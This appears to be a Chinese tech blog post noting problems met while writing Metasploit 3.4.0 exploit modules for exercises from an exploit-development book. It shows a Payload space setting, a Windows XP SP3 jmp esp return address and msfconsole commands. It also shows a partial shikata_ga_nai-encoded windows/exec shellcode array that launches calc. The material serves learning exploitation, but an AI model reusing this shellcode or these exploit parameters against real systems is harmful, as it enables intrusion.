Metasploit使用问题记录及攻击测试代码

最新推荐文章于 2024-07-11 09:38:19 发布
原创 最新推荐文章于 2024-07-11 09:38:19 发布 · 1.3w 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#测试 #stream #server #socket #struct #buffer

本文记录了使用Metasploit过程中遇到的问题,包括Payload Space不足的解决方法,Metasploit模块加载失败的语法调整,Windows XP SP3的exploit调整以及Metasploit常用命令的介绍。此外,还展示了一段223字节的shellcode代码示例。

1、利用failwest书中的例子进行测试,执行exploit后提示如下信息,说明 Payload'中的Space过小,增大即可,后面有例子程序可进行测试。

'Payload'        =>
                {
                    'Space'    => 300,
                    'BadChars' => "\x00",
                    'StackAdjustment' => -3500,
                },
[-] Exploit failed: No encoders encoded the buffer successfully.
 [*] Exploit completed, but no session was created.

2、如提示无法加载模块,说明rb文件书写语法有误,需要更改,不同的版本有可能语法也不完全相同,如下面的rb测试代码放到最新的版本中则无法加载,使用时注意。

3、目前使用metasploit3.4.0版本进行测试,测试时发现targets 中sp2及win 2000地址失效,所以用[ 'Windwos xp sp3',    { 'Ret' => 0x7c86467b} ], ,0x7c86467b地址为jmp esp测试成功,使用metasploit console输入 msfpescan -f -j esp c:/windows/system32/kernel32.dll

4、metasploit常用命令:

use 模块名

set payload XX

set rhost XX

set rport XX

set exitfunc seh

set cmd calc

set payload windows/exc

5、配置的shellcode为223个字节,即上面的300可以改为223

/*
 * windows/exec - 223 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * EXITFUNC=process, CMD=calc
 */
unsigned char buf[] =
"\xd9\xe5\xbd\x20\x99\xb8\x99\x31\xc9\xd9\x74\x24\xf4\x5e\xb1"
"\x32\x83\xee\xfc\x31\x6e\x13\x03\x4e\x8a\x5a\x6c\x72\x44\x13"
"\x8f\x8a\x95\x44\x19\x6f\xa4\x56\x7d\xe4\x95\x66\xf5\xa8\x15"
"\x0c\x5b\x58\xad\x60\x74\x6f\x06\xce\xa2\x5e\x97\xfe\x6a\x0c"
"\x5b\x60\x17\x4e\x88\x42\x26\x81\xdd\x83\x6f\xff\x2e\xd1\x38"
"\x74\x9c\xc6\x4d\xc8\x1d\xe6\x81\x47\x1d\x90\xa4\x97\xea\x2a"
"\xa6\xc7\x43\x20\xe0\xff\xe8\x6e\xd1\xfe\x3d\x6d\x2d\x49\x49"
"\x46\xc5\x48\x9b\x96\x26\x7b\xe3\x75\x19\xb4\xee\x84\x5d\x72"
"\x11\xf3\x95\x81\xac\x04\x6

最低0.47元/天 解锁文章

新学期VIP享超值加赠
Metasploit 漏洞检测实战
悦分享
11-27 1014
漏洞扫描将允许您快速扫描目标IP范围,寻找已知漏洞,让渗透测试人员快速了解可能值得进行的攻击。下面让我们看看Metasploit框架可以提供的一些漏洞扫描功能。
[网络安全自学篇] 五十三.Windows系统安全之Metasploit实现栈溢出攻击及反弹shell原理解析
杨秀璋的专栏
03-01 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了虚拟机基础知识,包括XP操作系统安装、文件共享设置、网络快照及网络设置等。这篇文章将讲解了如果搭建XP和Kali环境,并通过Windows漏洞实现栈溢出攻击,通过Metasploit反弹shell,从而Kali系统获取了XP系统的shell。基础性文章,希望您喜欢。
exploit已完成,但没有创建会话exploit completed, but no session was created
08-22 1万+
The "no session was created" message occurs if one of the following happens: 1) The exploit you use doesn't work against the target you selected. Could be the exploit is for a different ve...
使用metasploit利用vsftpd-2.3.4的backdoor进行exploit时出现的exploit completed but no session was created的解决办法
xixitaoguliuxian的博客
07-25 1万+
我在使用metasploit利用vsftpd-2.3.4的backdoor进行exploit时,总是出现的exploit completed but no session was created问题,针对这个现象,我找出了几点可能会导致这个问题出现的原因。 1、被攻击机器的防火墙打开了。 2、下载的vsftpd_2.3.4的默认配置有问题:          a)如果exploit时显示T...
使用Kali Linux Metasploit复现永恒之蓝
xujing19920814的博客
10-01 6854
使用Kali Linux Metasploit复现永恒之蓝
MSF里MS17_010利用模块笔记
zhoumouren88的博客
08-31 614
1. auxiliary/scanner/smb/smb_ms17_010 //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2. auxiliary/admin/smb/ms17_010_command //扫描445在线主机 MS17_010漏洞利用需要开放445 smb服务 3. exploit/windows/smb/ms17_010_eternalblue //漏洞利用模块 漏洞利用成功后如图所示,...
【MSFconsole进阶】exploits(渗透攻击模块):Active Exploit(主动渗透攻击)、Passive Exploit(被动渗透攻击
05-22 4219
【渗透工具】MSFconsole进阶:exploits(渗透攻击模块)
metasploit实验报告及漏洞利用代码
01-11
Metasploit是一款强大的安全渗透测试工具,主要用于模拟攻击和检测系统漏洞。它是开源社区的瑰宝,由 Rapid7 维护,并且在全球范围内被安全研究人员、渗透测试人员以及网络安全专业人员广泛使用。本实验报告将深入...
Linux 渗透测试基础:使用Metasploit、Nmap等工具进行渗透测试
最新发布
weixin_39372311的博客
07-11 600
渗透测试是一种重要的安全评估方法,可以帮助我们发现系统的漏洞和弱点,并及时修复,从而提高系统的安全性。通过使用Metasploit、Nmap等工具进行渗透测试,我们可以更有效地进行测试任务,提高测试的效率和准确性。在渗透测试过程中,我们需要遵循一些最佳实践,确保测试的合法性和有效性。
【网络安全】Metasploit渗透与攻击测试框架
weixin_46596227的博客
03-27 477
Metasploit是一个广泛使用的渗透测试工具,由 Rapid7 公司开发并维护。它是一个开源的框架,允许安全专业人员测试和评估网络上的漏洞和安全弱点。Metasploit有一个巨大的漏洞数据库,包含各种操作系统、服务和应用程序的漏洞。Metasploit 有一个强大的命令行界面,也有一个交互式图形用户界面,称为Armitage。它可以使用漏洞利用模块,自动化渗透测试过程,并对受攻击的系统进行远程控制。它还提供了一些辅助工具,如密码破解器、端口扫描器、漏洞扫描器等。
Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)
weixin_46035615的博客
04-14 5064
1.Metasploit 渗透测试框架介绍 2.Metasploitable2-Linux 靶机系统介绍 3.Metasploit 基本使用方法 4.实战-使用 msf 渗透攻击 Win7 主机并远程执行命令 5.实战-使用 msf 扫描靶机上 mysql 服务的空密码
ms08-067漏洞的复现及所遇到的问题分析
ianTok
10-12 5870
ms08-067
kali 渗透测试
煮酒闲谈
08-25 8374
利用kali进行渗透测试0x00摘要该文章转载自安全小飞侠,在kali下进行渗透测试演示,对于渗透测试的学习和理解非常有借鉴意义。0x01案列分析实验环境: 目标靶机:10.11.1.0/24 攻击机:Kali Linux (10.11.0.79) 信息收集:利用nmap扫描存在smb服务的主机:# nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.t
Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御
华为云官方博客
11-16 9577
摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程
36. Metasploit利用17-010时报错Could not make SMBv1 connection
__Qian的博客
03-18 1888
1.报错截图 2.解决方法,启用postgresql数据库 3.利用成功
渗透测试学习笔记之案例一
Fly_鹏程万里
07-06 5536
0x00 前言很久没有更新博客了,主要是因为工作很忙,写博客也太耗时间了。但是突然发现,许久不写很多东西都快生疏了。因而决定从今天起开始写一些跟渗透测试相关的文章,也可以认为是学习笔记吧,留作日后的技术积累和参考吧。0x01 案列分析实验环境:目标靶机:10.11.1.0/24攻击机:Kali Linux (10.11.0.79)信息收集:扫描存在smb服务的主机:# nmap -A -p 139...
metasploit介绍及使用
热门推荐
weixin_43873557的博客
02-07 2万+
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的工具。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。 目录 kali-metasploit框架目录路径: /opt/metasploit-framework/embedded/framework/ /usr/share
metasploit魔鬼训练营第一天笔记
f1gure的博客
12-10 861
实践题第一题 时间线:* May 7, 2007: Initial defect disclosure to the security (at) samba (dot) org [email concealed] email alias. * May 7, 2007: Initial developer response by Samba developer Gerald Carter
Metasploit实验报告与漏洞代码利用深度解析
- **实验报告撰写**Metasploit实验报告应详细记录实验的步骤、使用的工具、测试结果和分析等。 - **漏洞利用代码说明**:报告中应包括漏洞利用代码的说明,解释代码的功能和潜在的使用风险。 在实际使用...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值